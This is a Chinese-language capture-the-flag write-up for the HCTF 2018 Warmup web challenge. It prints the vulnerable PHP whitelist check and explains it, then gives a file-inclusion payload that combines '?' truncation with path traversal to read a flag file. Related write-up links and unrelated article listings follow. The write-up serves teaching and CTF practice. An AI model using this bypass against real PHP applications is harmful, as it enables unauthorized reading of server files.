HCTF 2018 Warmup

原题复现:https://gitee.com/xiaohua1998/hctf_2018_warmup

考察知识点:文件包含漏洞(phpmyadmin 4.8.1任意文件包含)

线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用协会内部的CTF训练平台找到此题

过程

访问页面查看源码发现注释里面的内容访问它

访问获得index.php的源码

payload:http://03b2cc85-7af4-439b-a06e-41da80ff6505.node3.buuoj.cn/index.php?file=source.php
 1  <?php

 2     highlight_file(__FILE__);

 3     class emmm

 4     {

 5         public static function checkFile(&$page)

 6         {

 7             $whitelist = ["source"=>"source.php","hint"=>"hint.php"];

 8             if (! isset($page) || !is_string($page)) {

 9                 echo "you can't see it";

10                 return false;

11             }

12

13             if (in_array($page, $whitelist)) {

14                 return true;

15             }

16

17             $_page = mb_substr(

18                 $page,

19                 0,

20                 mb_strpos($page . '?', '?')

21             );

22             if (in_array($_page, $whitelist)) {

23                 return true;

24             }

25

26             $_page = urldecode($page);

27             $_page = mb_substr(

28                 $_page,

29                 0,

30                 mb_strpos($_page . '?', '?')

31             );

32             if (in_array($_page, $whitelist)) {

33                 return true;

34             }

35             echo "you can't see it";

36             return false;

37         }

38     }

39

40     if (! empty($_REQUEST['file'])

41         && is_string($_REQUEST['file'])

42         && emmm::checkFile($_REQUEST['file'])

43     ) {

44         include $_REQUEST['file'];

45         exit;

46     } else {

47         echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";

48     }

49 ?>

PHP逻辑运算符

&&逻辑与

||逻辑或运算符

!empty($_REQUEST['file'])要我们的file变量不为空我们先进行分析这段代码 首先看80行第一个要求

is_string($_REQUEST['file'])要求我们传进来的值是字符串类型

emmm::checkFile($_REQUEST['file'])这里将我们的的值传到emmm类里面的checkFile函数

这三个值通过&&逻辑与运算符连接也就是要求这块函数的返回值要全为真才能执行if里面的文件包含的代码 否则就执行else里面的图片代码

 先来熟悉几个函数

//mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置
// mb_strpos (haystack ,needle )
// haystack:要被检查的字符串。
// needle:要搜索的字符串

//mb_substr() 函数返回字符串的一部分。

//str 必需。从该 string 中提取子字符串。
//start 必需。规定在字符串的何处开始。
//ength 可选。规定要返回的字符串长度。默认是直到字符串的结尾。

emmm类分析

从代码中发现新的页面hint访问获得flag文件名

payload:http://03b2cc85-7af4-439b-a06e-41da80ff6505.node3.buuoj.cn/index.php?file=hint.php

总的来说这个cehckFile这个函数进行了 3次白名单检测、 2次问好过滤、一次URL解码

 1   class emmm

 2     {

 3         public static function checkFile(&$page)

 4

 5         {

 6             //白名单列表

 7             $whitelist = ["source"=>"source.php","hint"=>"hint.php"];

 8             //isset()判断变量是否声明is_string()判断变量是否是字符串 &&用了逻辑与两个值都为真才执行if里面的值

 9             if (! isset($page) || !is_string($page)) {

10                 echo "you can't see it A";

11                 return false;

12             }

13             //检测传进来的值是否匹配白名单列表$whitelist 如果有则执行真

14             if (in_array($page, $whitelist)) {

15                 return true;

16             }

17             //过滤问号的函数(如果$page的值有?则从?之前提取字符串)

18             $_page = mb_substr(

19                 $page,

20                 0,

21                 mb_strpos($page . '?', '?')//返回$page.?里卖弄?号出现的第一个位置

22             );

23

24              //第二次检测传进来的值是否匹配白名单列表$whitelist 如果有则执行真

25             if (in_array($_page, $whitelist)) {

26                 return true;

27             }

28             //url对$page解码

29             $_page = urldecode($page);

30

31             //第二次过滤问号的函数(如果$page的值有?则从?之前提取字符串)

32             $_page = mb_substr(

33                 $_page,

34                 0,

35                 mb_strpos($_page . '?', '?')

36             );

37             //第三次检测传进来的值是否匹配白名单列表$whitelist 如果有则执行真

38             if (in_array($_page, $whitelist)) {

39                 return true;

40             }

41             echo "you can't see it";

42             return false;

43         }

44     }

我们现在可以构造获取flag的语句

hint.php?../../../../../ffffllllaaaagggg 我们可以想象他传入checkFile函数要经历 第一次白名单验证 一次?过滤后他就是hint.php 再进行一次白名单验证 返回为真 则达成条件进行包含得到flag

最终payload:http://03b2cc85-7af4-439b-a06e-41da80ff6505.node3.buuoj.cn/index.php?file=hint.php?../../../../../ffffllllaaaagggg 
												


											
[原题复现]HCTF 2018 Warmup(文件包含)的更多相关文章
	

    
								
  1. [原题复现+审计][BUUCTF 2018]WEB Online Tool(escapeshellarg和escapeshellcmd使用不当导致rce)
		
    简介  原题复现:https://github.com/glzjin/buuctf_2018_online_tool (环境php5.6.40)  考察知识点:escapeshellarg和escap ...
    
		
    2. 
						
  2. [原题复现]2018护网杯(WEB)easy_tornado(模板注入)
		
    简介 原题复现:  考察知识点:模板注入  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 [护网杯 2018]eas ...
    
		
    3. 
						
  3. [原题复现+审计][网鼎杯 2018] WEB Fakebook(SSRF、反序列化、SQL注入)
		
    简介  原题复现:  考察知识点:SSRF.反序列化.SQL注入  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过 ...
    
		
    4. 
						
  4. [原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等]
		
    简介  原题复现:  考察知识点:无参数命令执行.绕过filter_var(), preg_match()  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使 ...
    
		
    5. 
						
  5. [原题复现][CISCN 2019 初赛]WEB-Love Math(无参数RCE)[未完结]
		
    简介  原题复现:  考察知识点:无参数命令执行  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 源码审计 代码 1 ...
    
		
    6. 
						
  6. [原题复现]BJDCTF2020 WEB部分全部解
		
    简介  原题复现:https://gitee.com/xiaohua1998/BJDCTF2020_January  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学 ...
    
		
    7. 
						
  7. [原题复现+审计][ZJCTF 2019] WEB NiZhuanSiWei(反序列化、PHP伪协议、数组绕过)
		
    简介  原题复现:https://github.com/CTFTraining/zjctf_2019_final_web_nizhuansiwei/  考察知识点:反序列化.PHP伪协议.数组绕过   ...
    
		
    8. 
						
  8. [原题复现+审计][0CTF 2016] WEB piapiapia(反序列化、数组绕过)[改变序列化长度,导致反序列化漏洞]
		
    简介  原题复现:  考察知识点:反序列化.数组绕过  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 漏洞学习 数组 ...
    
		
    9. 
						
  9. [原题复现+审计][SUCTF 2019] WEB CheckIn(上传绕过、.user.ini)
		
    简介  原题复现:https://github.com/team-su/SUCTF-2019/tree/master/Web/checkIn  考察知识点:上传绕过..user.ini  线上平台:h ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 【应用服务 App Service】在Azure App Service中使用WebSocket - PHP的问题 - 如何使用和调用
			
    问题描述 在Azure App Service中,有对.Net,Java的WebSocket支持的示例代码,但是没有成功的PHP代码. 以下的步骤则是如何基于Azure App Service实现PH ...
    
			
    2. 
						
  2. 子父类存在同名成员时super的使用条件
			
    1.子父类存在同名成员时,子类中默认访问子类的成员,可通过super指定访问父类的成员,格式:super.xx  (注:xx是成员名): 2.创建子类对象时,默认会调用父类的无参构造方法,可通过sup ...
    
			
    3. 
						
  3. oracle oracle sqldeveloper 12505 创建连接失败
			
    ref:http://blog.csdn.net/yangwenxue_admin/article/details/45062557
    
			
    4. 
						
  4. R语言学习网站(分享)
			
    1. https://www.r-bloggers.com/ 2. https://www.kaggle.com/datasets 3. RStudio download: https://www.r ...
    
			
    5. 
						
  5. 什么是SOAP?SOAP有什么用?什么时候会用到SOAP?
			
    什么是SOAP SOAP(Simple Object Access Protocol)一般指简单对象访问协议,简单对象访问协议是交换数据的一种协议规范,是一种轻量的.简单的.基于XML(标准通用标记语 ...
    
			
    6. 
						
  6. CPU上下文
			
    CPU上下文 包括CPU寄存器和程序计数器(Program Counter,PC). CPU寄存器,是CPU内置的容量小.但速度极快的内存. 程序计数器,是用来存储CPU正在执行的指令位置.或者即将执 ...
    
			
    7. 
						
  7. uniapp使用swiper组件做tab切换动态获取高度
			
    swiper对高度进行了限制,所以说通常做出了tab切换的效果但是内容经常被截取掉???? 所以我在前端做了一个动态获取高度的功能 选项卡标题也就是tab切换的效果 选项卡内容区域的高度自适应 因为进 ...
    
			
    8. 
						
  8. Linux系统搭建Hadoop集群
			
    一.环境说明 IP地址 主机名 备注 操作系统 192.168.92.11 hserver1 namenode Ubuntu 16.04 192.168.92.12 hserver2 datanode ...
    
			
    9. 
						
  9. python数据类型之Number(数字)
			
    一.Number(数字) 关注公众号"轻松学编程"了解更多. 数据类型 ​ 为什么会有不同的数据类型? ​ 计算机是用来做数学计算的机器,因此它可以处理各种数值,但是计算机能够处理 ...
    
			
    10. 
						
  10. 【HNOI】分数分解
			
    题意描述 近来 IOI 专家们正在进行一项有关整数方程的研究,研究涉及到整数方程解集的统计问题,问题是这样的. 对任意的正整数 \(n\),我们有整数方程: \[\frac{1}{x_1}+\frac ...
    
			
    11.